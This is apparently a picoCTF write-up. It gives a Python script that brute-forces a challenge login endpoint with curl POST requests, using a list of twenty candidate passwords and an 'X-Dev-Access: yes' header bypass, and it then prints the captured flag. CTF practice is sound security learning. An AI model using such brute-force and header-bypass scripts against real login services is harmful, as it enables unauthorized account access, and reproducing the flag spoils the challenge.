

The same idea as the first one :

```
import subprocess

passwords = [
    "tkY83OwR", "vISQRFmM", "471HtPne", "s8nXfR6X", "WoQEk5GL",
    "eu8z9EFn", "0SMi2c8U", "WlHiKuw6", "0iaXgUGR", "shNKO NrW",
    "KaqwDEUA", "eSqOLef7", "CueFICmh", "MZZSJucZ", "eZQR9yx7",
    "sPEIun6X", "p0fkX9cA", "CY1sEmC6", "M707m17w", "8thnKYyN"
]

url = "http://amiable-citadel.picotf.net:50100/login"

for pwd in passwords:
    cmd = [
        "curl", "-s", "-X", "POST",
        "-H", "X-Dev-Access: yes",
        "-H", "Content-Type: application/json",
        "-d",
    f'{{"email":"ctf-player@picotf.org","password":"{pwd}"}}',
        url
    ]

    result = subprocess.run(cmd, capture_output=True, text=True)
    output = result.stdout

    print(f"Parola '{pwd}': ", end="")

    if "pico" in output.lower():
        print(output)
        break
```

THE FLAG : picoCTF{xff_byp4ss_brut3_1cc3b76e}
~Z4que